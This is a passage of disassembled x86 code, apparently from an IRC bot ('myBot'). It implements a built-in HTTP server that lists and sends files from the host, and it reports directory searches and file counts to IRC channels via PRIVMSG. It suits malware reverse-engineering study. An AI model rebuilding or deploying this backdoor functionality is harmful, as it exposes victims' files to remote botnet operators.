cmp eax, [ebp+var_8]
jbe loc_404509
mov [ebp+var_8], eax
jmp loc_404509
; ---------------------------------------------------------------------------
loc_4042C7: ; CODE XREF: sub_404138+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_415500
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_415500
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call ds:dword_436480 ; recv
test eax, eax
jg short loc_40435A
push esi
call ds:dword_436500 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_404509
lea eax, [ebp+var_134]
loc_404319: ; CODE XREF: sub_404138+1EB�j
cmp [eax], esi
jz short loc_40432A
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_404319
jmp loc_404509
; ---------------------------------------------------------------------------
loc_40432A: ; CODE XREF: sub_404138+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40434E
lea eax, [ebp+ecx*4+var_134]
loc_404338: ; CODE XREF: sub_404138+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_404338
loc_40434E: ; CODE XREF: sub_404138+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_404509
; ---------------------------------------------------------------------------
loc_40435A: ; CODE XREF: sub_404138+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_415500
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_415C80
add esp, 10h
test eax, eax
jbe loc_404509
loc_404388: ; CODE XREF: sub_404138+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_40442D
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz short loc_404401
lea eax, [ebp+var_18F0]
push eax
call sub_415C80
cmp eax, 5
pop ecx
jbe short loc_404401
mov eax, offset asc_425D24 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_415A50
pop ecx
pop ecx
push eax
call sub_415A50
pop ecx
pop ecx
push eax
call sub_416C8F
push eax
lea eax, [ebp+var_23C]
push eax
call sub_415B90
add esp, 10h
jmp short loc_404418
; ---------------------------------------------------------------------------
loc_404401: ; CODE XREF: sub_404138+27F�j
; sub_404138+291�j
lea eax, [ebp+var_18F0]
push offset asc_425D20 ; "\r\n"
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40444C
loc_404418: ; CODE XREF: sub_404138+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_415500
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40442D: ; CODE XREF: sub_404138+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_415C80
cmp [ebp+arg_0], eax
pop ecx
jb loc_404388
jmp loc_404509
; ---------------------------------------------------------------------------
loc_40444C: ; CODE XREF: sub_404138+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_404496
lea eax, [ebp+var_134]
loc_404458: ; CODE XREF: sub_404138+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_404469
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_404458
jmp short loc_404499
; ---------------------------------------------------------------------------
loc_404469: ; CODE XREF: sub_404138+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40448D
lea eax, [ebp+ecx*4+var_134]
loc_404477: ; CODE XREF: sub_404138+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_404477
loc_40448D: ; CODE XREF: sub_404138+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_404499
; ---------------------------------------------------------------------------
loc_404496: ; CODE XREF: sub_404138+318�j
mov esi, [ebp+var_4]
loc_404499: ; CODE XREF: sub_404138+32F�j
; sub_404138+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_404502
lea eax, [ebp+var_360]
push eax
call sub_415C80
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_415C80
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_404502
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call ds:dword_436504 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_404716
add esp, 14h
jmp short loc_404509
; ---------------------------------------------------------------------------
loc_404502: ; CODE XREF: sub_404138+369�j
; sub_404138+38F�j
push esi
call ds:dword_436500 ; closesocket
loc_404509: ; CODE XREF: sub_404138+11D�j
; sub_404138+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_404245
jmp loc_40420F
; ---------------------------------------------------------------------------
loc_40451E: ; CODE XREF: sub_404138+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_404523: ; CODE XREF: sub_404138+6A�j
; sub_404138+92�j ...
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_425CDC
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_404569
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_40BAE7
add esp, 14h
loc_404569: ; CODE XREF: sub_404138+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_40A5B3
pop ecx
push edi
call ds:dword_436500 ; closesocket
push [ebp+var_254]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
pop edi
pop esi
pop ebx
sub_404138 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404593 proc near ; DATA XREF: sub_404716+24D�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_415D00
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax
lea eax, [ebp+var_654]
push eax
call sub_415480
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_4045F9
push offset aTextHtml ; "text/html"
jmp short loc_4045FE
; ---------------------------------------------------------------------------
loc_4045F9: ; CODE XREF: sub_404593+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_4045FE: ; CODE XREF: sub_404593+64�j
lea eax, [ebp+var_9C]
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_422068 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_422064 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_404677
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_415480
add esp, 24h
jmp short loc_404698
; ---------------------------------------------------------------------------
loc_404677: ; CODE XREF: sub_404593+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_415480
add esp, 28h
loc_404698: ; CODE XREF: sub_404593+E2�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call ds:dword_4364B8 ; send
cmp [ebp+var_A4], edi
jnz short loc_4046D8
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_405053
pop ecx
pop ecx
jmp short loc_4046F5
; ---------------------------------------------------------------------------
loc_4046D8: ; CODE XREF: sub_404593+12D�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_4049CD
add esp, 10h
loc_4046F5: ; CODE XREF: sub_404593+143�j
push [ebp+var_44C]
call ds:dword_436500 ; closesocket
push [ebp+var_B4]
call sub_415248
pop ecx
push edi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_404593 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404716 proc near ; CODE XREF: sub_404138+3C0�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_415500
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_40474C
push eax
push offset aS_3 ; "\\%s"
jmp short loc_404755
; ---------------------------------------------------------------------------
loc_40474C: ; CODE XREF: sub_404716+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_404755: ; CODE XREF: sub_404716+34�j
lea eax, [ebp+var_10C]
push eax
call sub_415480
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_415C80
test eax, eax
pop ecx
jbe short loc_4047F0
mov [ebp+arg_8], 2
loc_404780: ; CODE XREF: sub_404716+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_415C80
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_4047C0
cmp [ebp+esi+var_10C], 25h
jnz short loc_4047C0
cmp [ebp+esi+var_10B], 32h
jnz short loc_4047C0
cmp [ebp+esi+var_10A], 30h
jnz short loc_4047C0
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_4047DA
; ---------------------------------------------------------------------------
loc_4047C0: ; CODE XREF: sub_404716+7A�j
; sub_404716+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_4047D0
push 5Ch
pop eax
jmp short loc_4047D3
; ---------------------------------------------------------------------------
loc_4047D0: ; CODE XREF: sub_404716+B3�j
movsx eax, al
loc_4047D3: ; CODE XREF: sub_404716+B8�j
mov [ebp+ebx+var_210], al
loc_4047DA: ; CODE XREF: sub_404716+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_415C80
cmp esi, eax
pop ecx
jb short loc_404780
loc_4047F0: ; CODE XREF: sub_404716+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_2 ; "%s%s"
push eax
call sub_415480
lea eax, [ebp+var_314]
push offset asc_425FD0 ; "\n"
push eax
call sub_416C8F
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:off_422080
push 1
cmp eax, 10h
pop esi
jz short loc_404841
cmp eax, 0FFFFFFFFh
jnz short loc_404844
push [ebp+arg_0]
jmp loc_4048C4
; ---------------------------------------------------------------------------
loc_404841: ; CODE XREF: sub_404716+11C�j
mov [ebp+var_4], esi
loc_404844: ; CODE XREF: sub_404716+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_404851
mov [ebp+var_4], esi
loc_404851: ; CODE XREF: sub_404716+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_4048CF
cmp [ebp+arg_C], edi
jz short loc_4048C3
lea eax, [ebp+var_314]
push offset asc_425FCC ; "*"
push eax
call sub_415BA0
pop ecx
lea eax, [ebp+var_314]
pop ecx
push eax
lea eax, [ebp+var_640]
push eax
call sub_415480
lea eax, [ebp+var_210]
push eax
call sub_405110
add esp, 0Ch
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_415480
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_40491E
; ---------------------------------------------------------------------------
loc_4048C3: ; CODE XREF: sub_404716+152�j
push ebx
loc_4048C4: ; CODE XREF: sub_404716+126�j
call ds:dword_436500 ; closesocket
jmp loc_4049C6
; ---------------------------------------------------------------------------
loc_4048CF: ; CODE XREF: sub_404716+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:off_42207C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40491E
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_415480
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:off_422078
push esi
mov [ebp+var_330], eax
call ds:off_422074
loc_40491E: ; CODE XREF: sub_404716+1AB�j
; sub_404716+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_425F8C
push eax
call sub_415480
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_414F2C
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov ds:dword_43BEC4[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_404593
push edi
push edi
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov ds:dword_43BED4[ecx], eax
jz short loc_404998
loc_404986: ; CODE XREF: sub_404716+280�j
cmp [ebp+var_318], edi
jnz short loc_4049C6
push 5
call ds:dword_422054 ; Sleep
jmp short loc_404986
; ---------------------------------------------------------------------------
loc_404998: ; CODE XREF: sub_404716+26E�j
push ebx
call ds:dword_436500 ; closesocket
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_425F44
push eax
call sub_415480
lea eax, [ebp+var_8C4]
push eax
call sub_40A5B3
add esp, 10h
loc_4049C6: ; CODE XREF: sub_404716+1B4�j
; sub_404716+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_404716 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049CD proc near ; CODE XREF: sub_404593+15A�p
; sub_40D2E0+49C9�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_415500
mov edi, [ebp+arg_0]
push offset asc_425FD0 ; "\n"
push edi
call sub_416C8F
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_404A2C
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_4159FA
add esp, 14h
jmp loc_404B2B
; ---------------------------------------------------------------------------
loc_404A2C: ; CODE XREF: sub_4049CD+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_404B11
call sub_415C80
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
push edi
call sub_415C80
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 0Ch
jmp short loc_404B2B
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4049CD+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 10h
loc_404B2B: ; CODE XREF: sub_4049CD+5A�j
; sub_4049CD+142�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
cmp [ebp+arg_C], ebx
jz short loc_404BC6
push [ebp+arg_C]
call sub_415C80
cmp eax, 2
pop ecx
jbe short loc_404BC6
push [ebp+arg_C]
call sub_415C80
sub eax, 3
pop ecx
jz short loc_404B77
loc_404B6B: ; CODE XREF: sub_4049CD+1A8�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_404B77
dec eax
jnz short loc_404B6B
loc_404B77: ; CODE XREF: sub_4049CD+19C�j
; sub_4049CD+1A5�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_416D30
add esp, 0Ch
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
loc_404BC6: ; CODE XREF: sub_4049CD+180�j
; sub_4049CD+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:off_422094
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:off_422090
test eax, eax
jz loc_404FB6
mov edi, 1FFh
loc_404BF2: ; CODE XREF: sub_4049CD+5E3�j
cmp [ebp+var_388], ebx
jz loc_404F9E
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_404F9E
lea eax, [ebp+var_35C]
push offset a__1 ; "."
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_404F9E
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_42208C ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_422088 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_404C67
mov ecx, offset aAm ; "AM"
loc_404C67: ; CODE XREF: sub_4049CD+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_404C73
sub eax, 0Ch
loc_404C73: ; CODE XREF: sub_4049CD+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_415480
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_404E16
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_404CE7
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_404F5F
; ---------------------------------------------------------------------------
loc_404CE7: ; CODE XREF: sub_4049CD+2E0�j
cmp [ebp+arg_C], ebx
jz loc_404DD1
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_0 ; "%s%s/"
push edi
push eax
call sub_4159FA
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
lea eax, [ebp+var_35C]
push eax
call sub_415C80
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_404D87
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_404D8C
; ---------------------------------------------------------------------------
loc_404D87: ; CODE XREF: sub_4049CD+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_404D8C: ; CODE XREF: sub_4049CD+3B8�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_404F60
; ---------------------------------------------------------------------------
loc_404DD1: ; CODE XREF: sub_4049CD+31D�j
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_4159FA
add esp, 14h
jmp loc_404F6F
; ---------------------------------------------------------------------------
loc_404E16: ; CODE XREF: sub_4049CD+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_404E55
push ebx
push [ebp+var_368]
call sub_40B62E
pop ecx
pop ecx
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi
loc_404E41: ; CODE XREF: sub_4049CD+577�j
lea eax, [ebp+var_248]
push eax
call sub_4159FA
add esp, 1Ch
jmp loc_404F6F
; ---------------------------------------------------------------------------
loc_404E55: ; CODE XREF: sub_4049CD+44F�j
cmp [ebp+arg_C], ebx
jz loc_404F49
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_2 ; "%s%s"
push edi
push eax
call sub_4159FA
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
lea eax, [ebp+var_35C]
push eax
call sub_415C80
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_404EF5
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_404EFA
; ---------------------------------------------------------------------------
loc_404EF5: ; CODE XREF: sub_4049CD+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_404EFA: ; CODE XREF: sub_4049CD+526�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_4159FA
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_404E41
; ---------------------------------------------------------------------------
loc_404F49: ; CODE XREF: sub_4049CD+48B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_404F5F: ; CODE XREF: sub_4049CD+315�j
push esi
loc_404F60: ; CODE XREF: sub_4049CD+3FF�j
lea eax, [ebp+var_248]
push eax
call sub_4159FA
add esp, 18h
loc_404F6F: ; CODE XREF: sub_4049CD+444�j
; sub_4049CD+483�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
cmp [ebp+arg_8], ebx
jz short loc_404F9E
push 7D0h
call ds:dword_422054 ; Sleep
loc_404F9E: ; CODE XREF: sub_4049CD+22B�j
; sub_4049CD+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:off_422090
test eax, eax
jnz loc_404BF2
loc_404FB6: ; CODE XREF: sub_4049CD+21A�j
push [ebp+arg_0]
call ds:off_422084
cmp [ebp+arg_8], ebx
jz short loc_404FF9
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_415480
add esp, 14h
jmp short loc_40502D
; ---------------------------------------------------------------------------
loc_404FF9: ; CODE XREF: sub_4049CD+5F5�j
cmp [ebp+arg_C], ebx
jz short loc_405013
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_415480
pop ecx
pop ecx
jmp short loc_40502D
; ---------------------------------------------------------------------------
loc_405013: ; CODE XREF: sub_4049CD+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_415480
add esp, 10h
loc_40502D: ; CODE XREF: sub_4049CD+62A�j
; sub_4049CD+644�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4364B8 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4049CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
